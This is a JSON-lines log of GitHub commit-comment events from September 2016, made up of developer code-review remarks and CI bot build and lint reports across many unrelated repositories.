{"id":"4568642066","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19037980,"position":null,"line":null,"path":null,"commit_id":"20e8d8954742d738c91b35267f5f0b69c0b3c038","created_at":"2016-09-15T15:00:24Z","updated_at":"2016-09-15T15:00:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1014](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13362&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T15:00:24Z"}
{"id":"4568643453","type":"CommitCommentEvent","actor":{"login":"sayuga"},"repo":{"name":"sayuga/GAS-Tools"},"payload":{"comment":{"id":19037983,"position":null,"line":null,"path":null,"commit_id":"b00f589f1537df5879f443a5efe11d6bf5e75e3e","created_at":"2016-09-15T15:00:38Z","updated_at":"2016-09-15T15:00:38Z","body":"Added overrun trigger control within sheet to prevent to commit as spreadsheet pull in the event of particularly large loops. "}},"created_at":"2016-09-15T15:00:38Z"}
{"id":"4568643619","type":"CommitCommentEvent","actor":{"login":"kimber-no-ly"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19037984,"position":8,"line":8,"path":"server/db/models/cart.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:00:40Z","updated_at":"2016-09-15T15:00:40Z","body":"I believe this quantity will refer to just the cart and not each associated product.\r\nDo you think there should be any other cart properties?"}},"created_at":"2016-09-15T15:00:40Z"}
{"id":"4568643785","type":"CommitCommentEvent","actor":{"login":"zaps166"},"repo":{"name":"reagentoo/gentoo-overlay"},"payload":{"comment":{"id":19037985,"position":null,"line":null,"path":null,"commit_id":"7c26fe65704af197d6ff984683933ead243dccb6","created_at":"2016-09-15T15:00:41Z","updated_at":"2016-09-15T15:00:41Z","body":"Why not? It's simpler to do this rather than compiling FFmpeg with libgme support. It'll still require the external libgme library. Similar about libmodplug, but I've modified libmodplug sources (e.g. SFX, J2B support and 669 bugfix)."}},"created_at":"2016-09-15T15:00:41Z"}
{"id":"4568644861","type":"CommitCommentEvent","actor":{"login":"man14637"},"repo":{"name":"man14637/cit270"},"payload":{"comment":{"id":19037987,"position":1,"line":1,"path":"README.md","commit_id":"aa192e73179c4a674f8107ada55799d1e97245d8","created_at":"2016-09-15T15:00:52Z","updated_at":"2016-09-15T15:00:52Z","body":"This class is base off of scripting languages. Perl, Javascript, Ruby, and more."}},"created_at":"2016-09-15T15:00:52Z"}
{"id":"4568644939","type":"CommitCommentEvent","actor":{"login":"bibekthapa"},"repo":{"name":"bibekthapa/WebScrapper"},"payload":{"comment":{"id":19037988,"position":null,"line":null,"path":null,"commit_id":"f50ef992f2908625c43d98b5b175fa494b463e28","created_at":"2016-09-15T15:00:53Z","updated_at":"2016-09-15T15:00:53Z","body":"This is the place where we can search jobs by keywords"}},"created_at":"2016-09-15T15:00:53Z"}
{"id":"4568645007","type":"CommitCommentEvent","actor":{"login":"nwoetzel"},"repo":{"name":"seek4science/seek"},"payload":{"comment":{"id":19037989,"position":null,"line":null,"path":null,"commit_id":"1485f38574cb72d812fb4ed5d37eccbfa6662243","created_at":"2016-09-15T15:00:53Z","updated_at":"2016-09-15T15:00:53Z","body":"it seems that the schema.db was changed in that commit, but there is no corresponding migration for dropping the tables 'assay_types_edges' and 'technology_types_edges'"}},"created_at":"2016-09-15T15:00:53Z"}
{"id":"4568647478","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19037998,"position":26,"line":438,"path":"src/utils/polygon.cpp","commit_id":"955399765c62f1a37df6d822d22c882872d837d9","created_at":"2016-09-15T15:01:17Z","updated_at":"2016-09-15T15:01:17Z","body":"Then in the next iteration we find that out for going forward and in the one after that we find out for going backward and than we break the loop.\r\nThe loop continues until we established that both sides cannot go any further.\r\nIn this case we see that we can do a double step even though taking either of the steps was impossible."}},"created_at":"2016-09-15T15:01:17Z"}
{"id":"4568651909","type":"CommitCommentEvent","actor":{"login":"nummha"},"repo":{"name":"nummha/namer"},"payload":{"comment":{"id":19038013,"position":null,"line":null,"path":null,"commit_id":"a174252896eed7106f1471608d6980c689f9f8f8","created_at":"2016-09-15T15:02:00Z","updated_at":"2016-09-15T15:02:00Z","body":"This is a test_file"}},"created_at":"2016-09-15T15:02:00Z"}
{"id":"4568654725","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038016,"position":17,"line":17,"path":"server/db/index.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:02:28Z","updated_at":"2016-09-15T15:02:28Z","body":"with `A.belongsTo(B)` associations, consider also adding `B.hasMany(A)` associations. They are redundant in terms of what they do to the SQL tables (both create a foreign key on A) but they are not redundant in terms of Sequelize instance methods; the latter enables you to do stuff like `B.getAs`."}},"created_at":"2016-09-15T15:02:28Z"}
{"id":"4568657337","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038023,"position":45,"line":45,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:02:53Z","updated_at":"2016-09-15T15:02:53Z","body":"Why should we initialize the map to 32000 ?"}},"created_at":"2016-09-15T15:02:53Z"}
{"id":"4568659323","type":"CommitCommentEvent","actor":{"login":"psteinb"},"repo":{"name":"psteinb/x264"},"payload":{"comment":{"id":19038032,"position":null,"line":null,"path":null,"commit_id":"570d14ae50a1a666d2f71280500dc93c73415957","created_at":"2016-09-15T15:03:10Z","updated_at":"2016-09-15T15:03:10Z","body":"I know, that's why I ditched doing that. x264.h is the same as in master \nAFAIK. Or am I overseeing something?\n"}},"created_at":"2016-09-15T15:03:10Z"}
{"id":"4568661073","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19038039,"position":null,"line":null,"path":null,"commit_id":"7d3ebb019c7203069e76fcf12ee396310153ee47","created_at":"2016-09-15T15:03:25Z","updated_at":"2016-09-15T15:03:25Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/469/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T15:03:25Z"}
{"id":"4568662141","type":"CommitCommentEvent","actor":{"login":"NamelessCoder"},"repo":{"name":"move-elevator/me_placeholder"},"payload":{"comment":{"id":19038045,"position":null,"line":null,"path":null,"commit_id":"2b83ae26f37d6bf2dadbcfbd067c0fbd0b7bdaf1","created_at":"2016-09-15T15:03:36Z","updated_at":"2016-09-15T15:03:36Z","body":"- Error code: 0 - Call to a member function getType() on a non-object\n\n- NamelessCoder\\GizzleGitPlugins\\GizzlePlugins\\ClonePlugin:000000002dc03f600000000021ff033b:\n  - 0: Executing Git clone command: /usr/bin/git clone --depth 1 --single-branch --branch '1.1.1' 'https://github.com/move-elevator/me_placeholder.git' /tmp/2b83ae26f37d6bf2dadbcfbd067c0fbd0b7bdaf1/me_placeholder"}},"created_at":"2016-09-15T15:03:36Z"}
{"id":"4568664900","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038048,"position":18,"line":18,"path":"server/db/index.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:04:00Z","updated_at":"2016-09-15T15:04:00Z","body":"Likewise maybe add `Product.belongsTo(Cart)`."}},"created_at":"2016-09-15T15:04:00Z"}
{"id":"4568665073","type":"CommitCommentEvent","actor":{"login":"funkey"},"repo":{"name":"TuragaLab/PyGreentea"},"payload":{"comment":{"id":19038051,"position":4,"line":66,"path":"data_io/dataset_reading.py","commit_id":"50be17ebcbee787ac87555fcb25db6aa8a52d2e9","created_at":"2016-09-15T15:04:02Z","updated_at":"2016-09-15T15:04:02Z","body":"To handle the boundary cases in the component erosion correctly, I need this code to know the mask. Thus, the mask is generated earlier now, and then passed to the component erosion. The passing to the component erosion is done in commit https://github.com/TuragaLab/PyGreentea/commit/c14f6d98105184b9c1c780d894efcce386d7cbb7, I forgot to include that in this commit."}},"created_at":"2016-09-15T15:04:02Z"}
{"id":"4568665405","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038052,"position":33,"line":33,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:04:05Z","updated_at":"2016-09-15T15:04:05Z","body":"We should clean this map if we don't want to face memory leak.\r\n(The real question is how :D)\r\n\r\n"}},"created_at":"2016-09-15T15:04:05Z"}
{"id":"4568681931","type":"CommitCommentEvent","actor":{"login":"kimber-no-ly"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038087,"position":11,"line":11,"path":"server/db/models/reviews.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:06:30Z","updated_at":"2016-09-15T15:06:30Z","body":"Maybe add some validations? \r\n(All reviews must be at least X characters)"}},"created_at":"2016-09-15T15:06:30Z"}
{"id":"4568682594","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19038090,"position":null,"line":null,"path":null,"commit_id":"530c4cbf044fdd333a605df6b40a2b2c1502df8f","created_at":"2016-09-15T15:06:36Z","updated_at":"2016-09-15T15:06:36Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/470/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T15:06:36Z"}
{"id":"4568684071","type":"CommitCommentEvent","actor":{"login":"felixjones"},"repo":{"name":"AltimitSystems/mruby"},"payload":{"comment":{"id":19038092,"position":null,"line":null,"path":null,"commit_id":"18662ff57653a8e795c43ff9d102ece0478505b3","created_at":"2016-09-15T15:06:48Z","updated_at":"2016-09-15T15:06:48Z","body":"This addresses issue https://github.com/mruby/mruby/issues/3208\r\n\r\nGCC support is lost for the time being, the current default compiler for NDK at the moment is clang but it would be nice to get GCC back in.\r\n\r\nmips and mips64 targets fail for me with the clang command. I can't figure out why, so right now mips/mips64 support isn't there either.\r\n\r\nBuilding for android should now be as easy as;\r\n```ruby\r\nMRuby::CrossBuild.new('android-armeabi') do |conf|\r\n  toolchain :android, :arch => /armeabi/    \r\nend\r\n```\r\n\r\nWith supported architectures being: _armeabi_, _armeabi-v7a_, _arm64-v8a_, _x86_, _x86_64_"}},"created_at":"2016-09-15T15:06:48Z"}
{"id":"4568685793","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"ZooKang/manifest"},"payload":{"comment":{"id":19038097,"position":null,"line":null,"path":null,"commit_id":"6e404dc5495c2a9f28a7dec12325cfefd0e866e1","created_at":"2016-09-15T15:07:05Z","updated_at":"2016-09-15T15:07:05Z","body":"Dope"}},"created_at":"2016-09-15T15:07:05Z"}
{"id":"4568686158","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038098,"position":21,"line":21,"path":"server/db/index.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:07:09Z","updated_at":"2016-09-15T15:07:09Z","body":"These three relationships make sense to me."}},"created_at":"2016-09-15T15:07:09Z"}
{"id":"4568687209","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19038103,"position":null,"line":null,"path":null,"commit_id":"53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0","created_at":"2016-09-15T15:07:18Z","updated_at":"2016-09-15T15:07:18Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2335 of 2336 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T15:07:18Z"}
{"id":"4568690197","type":"CommitCommentEvent","actor":{"login":"wsalesky"},"repo":{"name":"srophe/srophe-eXist-app"},"payload":{"comment":{"id":19038109,"position":null,"line":null,"path":null,"commit_id":"45d038cd598e70374030a251bc5b506cdbf05ad7","created_at":"2016-09-15T15:07:46Z","updated_at":"2016-09-15T15:07:46Z","body":"@nathangibson Done. "}},"created_at":"2016-09-15T15:07:46Z"}
{"id":"4568692381","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19038115,"position":16,"line":17,"path":"src/System.Security.Cryptography.Algorithms/src/System.Security.Cryptography.Algorithms.csproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T15:08:07Z","updated_at":"2016-09-15T15:08:07Z","body":"It is still needed as changes are still pending for net463 which will resolve this... Note that TargetGroup it is set to netstandard1.7 in the line above"}},"created_at":"2016-09-15T15:08:07Z"}
{"id":"4568695561","type":"CommitCommentEvent","actor":{"login":"JoakimLarsson"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19038126,"position":null,"line":null,"path":null,"commit_id":"649cb254f5b6d3b886c8476ace84e2fccfa0633b","created_at":"2016-09-15T15:08:35Z","updated_at":"2016-09-15T15:08:35Z","body":"Supercool! :)"}},"created_at":"2016-09-15T15:08:35Z"}
{"id":"4568697356","type":"CommitCommentEvent","actor":{"login":"kimber-no-ly"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038130,"position":18,"line":18,"path":"server/db/index.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:08:50Z","updated_at":"2016-09-15T15:08:50Z","body":"Also think about properties that are about the association between a specific order and it's products "}},"created_at":"2016-09-15T15:08:50Z"}
{"id":"4568697620","type":"CommitCommentEvent","actor":{"login":"sebcat"},"repo":{"name":"sebcat/move-literals"},"payload":{"comment":{"id":19038133,"position":52,"line":69,"path":"move-literals.lua","commit_id":"cca5e3b78a36d85848165fa1644af03bc05b74f1","created_at":"2016-09-15T15:08:52Z","updated_at":"2016-09-15T15:08:52Z","body":"Added"}},"created_at":"2016-09-15T15:08:52Z"}
{"id":"4568698548","type":"CommitCommentEvent","actor":{"login":"sebcat"},"repo":{"name":"sebcat/move-literals"},"payload":{"comment":{"id":19038137,"position":29,"line":46,"path":"move-literals.lua","commit_id":"cca5e3b78a36d85848165fa1644af03bc05b74f1","created_at":"2016-09-15T15:09:00Z","updated_at":"2016-09-15T15:09:00Z","body":"Fixed"}},"created_at":"2016-09-15T15:09:00Z"}
{"id":"4568701608","type":"CommitCommentEvent","actor":{"login":"ghoogland"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19038148,"position":null,"line":null,"path":null,"commit_id":"ce0f2fdd3735628c0184c9905b22df956d997c9d","created_at":"2016-09-15T15:09:30Z","updated_at":"2016-09-15T15:09:30Z","body":"Tested with FAB: This fixes it, but introduces another issue: FAB shows everything left aligned.\r\nSofar, I did not find the cause. Binary the STL looks fine, and justification is 00 (=unchanged)"}},"created_at":"2016-09-15T15:09:30Z"}
{"id":"4568702715","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"rhabbachi/displaylink-pkgbuild"},"payload":{"comment":{"id":19038158,"position":null,"line":null,"path":null,"commit_id":"718154b32d8ea924ee7090e871de86fd20fef579","created_at":"2016-09-15T15:09:41Z","updated_at":"2016-09-15T15:09:41Z","body":"Damn it, I was just about to apply your changes to the aur repository, when a few more problems occurred to me (in order of occurence :-) ):\r\n\r\n1. You are not supposed to add non standard variables and if you do, they have to start with an underscore (PKGBUILD (displaylink) W: Non standard variable 'evdiver' doesn't start with an underscore)\r\n2. You are copying the built evdilib in a folder with the wrong version id (pkgver)\r\n3. If you were to fix this, the file displaylink.install will fail to run dkms\r\n\r\nWhat are your thoughts on that?\r\n"}},"created_at":"2016-09-15T15:09:41Z"}
{"id":"4568705676","type":"CommitCommentEvent","actor":{"login":"kimber-no-ly"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038169,"position":44,"line":44,"path":"server/db/models/products.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:10:09Z","updated_at":"2016-09-15T15:10:09Z","body":"How about an inventory quantity?\r\nValidations for category?\r\nDefault photo?"}},"created_at":"2016-09-15T15:10:09Z"}
{"id":"4568705968","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038171,"position":8,"line":8,"path":"server/db/models/cart.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:10:13Z","updated_at":"2016-09-15T15:10:13Z","body":"Not sure how this can be quantity of *each* product — a cart will only have one `quantity` which will be a single number."}},"created_at":"2016-09-15T15:10:13Z"}
{"id":"4568706826","type":"CommitCommentEvent","actor":{"login":"atumanian"},"repo":{"name":"atumanian/Stockfish"},"payload":{"comment":{"id":19038174,"position":null,"line":null,"path":null,"commit_id":"5df62e5d9286c38f486ea89fbc8d2d9b51445dd9","created_at":"2016-09-15T15:10:21Z","updated_at":"2016-09-15T15:10:21Z","body":"Sorry, I don't know why bench showed a different signature the previous time. I deleted the source files, downloaded them again, then complied again and this time I got the correct signature.\r\nDidn't know a similar patch was tested earlier."}},"created_at":"2016-09-15T15:10:21Z"}
{"id":"4568707201","type":"CommitCommentEvent","actor":{"login":"juliusmh"},"repo":{"name":"picturepan2/spectre"},"payload":{"comment":{"id":19038175,"position":null,"line":null,"path":null,"commit_id":"9ff1cec733dfab4183bfb7aa5e18ef4e13e9a16a","created_at":"2016-09-15T15:10:25Z","updated_at":"2016-09-15T15:10:25Z","body":"@azurvii You can easily pick an earlier version or you can add the css differences you see here to your own css file.. shouldnt be that hard :)"}},"created_at":"2016-09-15T15:10:25Z"}
{"id":"4568708060","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":19038180,"position":3,"line":22,"path":"ui/app.jsx","commit_id":"c8fefa87ba1acd6f56ff038cbcc3ad850cbe5e3c","created_at":"2016-09-15T15:10:33Z","updated_at":"2016-09-15T15:10:33Z","body":"This is still misspelled"}},"created_at":"2016-09-15T15:10:33Z"}
{"id":"4568708884","type":"CommitCommentEvent","actor":{"login":"larshelge"},"repo":{"name":"dhis2/dhis2-core"},"payload":{"comment":{"id":19038183,"position":39,"line":120,"path":"dhis-2/dhis-services/dhis-service-core/src/main/java/org/hisp/dhis/pushanalysis/DefaultPushAnalysisService.java","commit_id":"b6398f2af90af7c9a1f60e672a45bc46b7a674b6","created_at":"2016-09-15T15:10:41Z","updated_at":"2016-09-15T15:10:41Z","body":"Use Map as interface type."}},"created_at":"2016-09-15T15:10:41Z"}
{"id":"4568710688","type":"CommitCommentEvent","actor":{"login":"taterbase"},"repo":{"name":"syscrusher/golang.tmbundle"},"payload":{"comment":{"id":19038190,"position":4,"line":4,"path":"Support/gomate.rb","commit_id":"6ff13b967cebae6da22eb0dd3ef5ad585a2190cc","created_at":"2016-09-15T15:10:56Z","updated_at":"2016-09-15T15:10:56Z","body":"This string got broken in the merge btw"}},"created_at":"2016-09-15T15:10:56Z"}
{"id":"4568711359","type":"CommitCommentEvent","actor":{"login":"sivajyothisaladi"},"repo":{"name":"sivajyothisaladi/Tutorial"},"payload":{"comment":{"id":19038192,"position":null,"line":null,"path":null,"commit_id":"01ad9157cf120fc61d472c0fd66a58ce36b4df94","created_at":"2016-09-15T15:11:02Z","updated_at":"2016-09-15T15:11:02Z","body":"copyfiles"}},"created_at":"2016-09-15T15:11:02Z"}
{"id":"4568712485","type":"CommitCommentEvent","actor":{"login":"ITDreamSKY"},"repo":{"name":"ITDreamSKY/XQYZ"},"payload":{"comment":{"id":19038196,"position":null,"line":null,"path":null,"commit_id":"6bc564aeeb77974bf45e7f5bbc2ff08891a034c0","created_at":"2016-09-15T15:11:14Z","updated_at":"2016-09-15T15:11:14Z","body":"nice"}},"created_at":"2016-09-15T15:11:14Z"}
{"id":"4568712633","type":"CommitCommentEvent","actor":{"login":"sivajyothisaladi"},"repo":{"name":"sivajyothisaladi/Tutorial"},"payload":{"comment":{"id":19038197,"position":null,"line":null,"path":null,"commit_id":"01ad9157cf120fc61d472c0fd66a58ce36b4df94","created_at":"2016-09-15T15:11:15Z","updated_at":"2016-09-15T15:11:15Z","body":"copy code"}},"created_at":"2016-09-15T15:11:15Z"}
{"id":"4568714742","type":"CommitCommentEvent","actor":{"login":"kimber-no-ly"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038200,"position":127,"line":127,"path":"seed.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:11:35Z","updated_at":"2016-09-15T15:11:35Z","body":"No more users? :("}},"created_at":"2016-09-15T15:11:35Z"}
{"id":"4568716016","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19038202,"position":null,"line":null,"path":null,"commit_id":"20e8d8954742d738c91b35267f5f0b69c0b3c038","created_at":"2016-09-15T15:11:47Z","updated_at":"2016-09-15T15:11:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1014](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13362&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 238, ignored: 3 Build time: 00:11:24"}},"created_at":"2016-09-15T15:11:47Z"}
{"id":"4568717398","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19038207,"position":null,"line":null,"path":null,"commit_id":"a589d57cd91a7c39bf95a159df891437041e583e","created_at":"2016-09-15T15:12:00Z","updated_at":"2016-09-15T15:12:00Z","body":"os_2_0_develop (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T15:12:00Z"}
{"id":"4568720684","type":"CommitCommentEvent","actor":{"login":"ehmry"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":19038220,"position":12,"line":68,"path":"repos/os/include/input_session/client.h","commit_id":"f0eb07a7f0dbbe1b66517cbc4d8acfbcca8ef4e3","created_at":"2016-09-15T15:12:35Z","updated_at":"2016-09-15T15:12:35Z","body":"I had a version with min, and then I decided it better to print an error if the service misbehaves, and I forgot to remove the min.\r\n\r\nI found no use for a return value, but I figured it was cheaper than a counter. Nitpicker does maintain a count of events, but that is related to a state machine that merges events, and I did not touch that for now."}},"created_at":"2016-09-15T15:12:35Z"}
{"id":"4568726744","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038241,"position":344,"line":298,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/UdpMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:13:35Z","updated_at":"2016-09-15T15:13:35Z","body":"I suppose if we want to be coherent we should get observation by token+correlationContext in Observation store.\r\nBut let's do this in another PR/branch"}},"created_at":"2016-09-15T15:13:35Z"}
{"id":"4568727474","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038245,"position":11,"line":11,"path":"server/db/models/user.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:13:42Z","updated_at":"2016-09-15T15:13:42Z","body":"I like that you're adding validations."}},"created_at":"2016-09-15T15:13:42Z"}
{"id":"4568729650","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038259,"position":18,"line":18,"path":"server/db/models/user.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:14:00Z","updated_at":"2016-09-15T15:14:00Z","body":"![bitmoji](https://render.bitstrips.com/v2/cpanel/9281517-122921288_15-s1-v1.png?palette=1&width=246)"}},"created_at":"2016-09-15T15:14:00Z"}
{"id":"4568731812","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038262,"position":26,"line":26,"path":"server/db/models/user.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:14:23Z","updated_at":"2016-09-15T15:14:23Z","body":"Makes sense to me."}},"created_at":"2016-09-15T15:14:23Z"}
{"id":"4568733299","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19038265,"position":null,"line":null,"path":null,"commit_id":"a1ec68715c5de7f31c330590868876bc10e583a6","created_at":"2016-09-15T15:14:37Z","updated_at":"2016-09-15T15:14:37Z","body":"[R/ABC_SMC.R:79:1:](https://github.com/richelbilderbeek/nLTT/blob/a1ec68715c5de7f31c330590868876bc10e583a6/R/ABC_SMC.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tstoprate_reached <- FALSE\n^\n```\n[R/ABC_SMC.R:152:9:](https://github.com/richelbilderbeek/nLTT/blob/a1ec68715c5de7f31c330590868876bc10e583a6/R/ABC_SMC.R#L152) *style:* **Use two spaces to indent, never tabs.**\n```r\n​        \t  stoprate_reached <- TRUE\n        ^\n```\n[R/ABC_SMC.R:159:5:](https://github.com/richelbilderbeek/nLTT/blob/a1ec68715c5de7f31c330590868876bc10e583a6/R/ABC_SMC.R#L159) *style:* **Use two spaces to indent, never tabs.**\n```r\n​    \t\tbreak;\n    ^~\n```\n[R/ABC_SMC.R:186:1:](https://github.com/richelbilderbeek/nLTT/blob/a1ec68715c5de7f31c330590868876bc10e583a6/R/ABC_SMC.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/ABC_SMC.R:187:26:](https://github.com/richelbilderbeek/nLTT/blob/a1ec68715c5de7f31c330590868876bc10e583a6/R/ABC_SMC.R#L187) *style:* **Put spaces around all infix operators.**\n```r\n​\tstoprate_reached <- FALSE\n                        ~^~~\n```\n[R/ABC_SMC.R:260:36:](https://github.com/richelbilderbeek/nLTT/blob/a1ec68715c5de7f31c330590868876bc10e583a6/R/ABC_SMC.R#L260) *style:* **Put spaces around all infix operators.**\n```r\n​        \t  stoprate_reached <- TRUE\n                                  ~^~~\n```"}},"created_at":"2016-09-15T15:14:37Z"}
{"id":"4568733815","type":"CommitCommentEvent","actor":{"login":"dneto0"},"repo":{"name":"KhronosGroup/SPIRV-Tools"},"payload":{"comment":{"id":19038269,"position":6,"line":46,"path":"source/table.cpp","commit_id":"5c7107d481b0fe9602bfea1c5e01ac409ba54636","created_at":"2016-09-15T15:14:41Z","updated_at":"2016-09-15T15:14:41Z","body":"\"default\""}},"created_at":"2016-09-15T15:14:41Z"}
{"id":"4568733896","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19038270,"position":null,"line":null,"path":null,"commit_id":"0a6bdc53477dd29eae9bca2bdf53afb0467d7b9a","created_at":"2016-09-15T15:14:42Z","updated_at":"2016-09-15T15:14:42Z","body":"TeamCity Todo :: Build [Build 103](http://109.103.226.38:8512/viewLog.html?buildId=38498&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-15T15:14:42Z"}
